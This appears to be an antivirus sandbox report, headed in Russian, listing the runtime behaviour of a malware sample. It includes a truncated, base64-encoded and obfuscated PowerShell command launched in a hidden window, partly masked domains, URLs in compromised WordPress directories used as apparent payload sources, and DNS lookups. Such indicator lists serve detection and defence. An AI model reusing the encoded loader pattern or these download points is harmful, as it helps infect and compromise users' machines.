Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAFQAVgBVAFgAbQBoAGQAPQAnAEcASQBEAEcASQB0AHYAcgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAdQByAGAASQBUAFkAUABSAE8AdABPAGAAYwBvAEwAIgAgAD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1988
- %TEMP%\1014427.cvr
- 'tr####ancers.com':80
- 'tr####ancers.com':443
- 'ka###u.com.br':80
- 'ip###mer.com.br':80
- http://www.tr####ancers.com/wp-includes/certificates/qzafEEIk/
- http://ka###u.com.br/wp-content/f9jp11mf09787216/
- http://www.ka###u.com.br/wp-content/f9jp11mf09787216/
- http://ip###mer.com.br/wp-admin/zirl02193/
- 'tr####ancers.com':443
- DNS ASK tr####ancers.com
- DNS ASK vm##i.ga
- DNS ASK ka###u.com.br
- DNS ASK ip###mer.com.br
- DNS ASK fo#####3.mycpanel.rs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAFQAVgBVAFgAbQBoAGQAPQAnAEcASQBEAEcASQB0AHYAcgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAdQByAGAASQBUAFkAUABSAE8AdABPAGAAYwBvAEwAIgAgAD...' (со скрытым окном)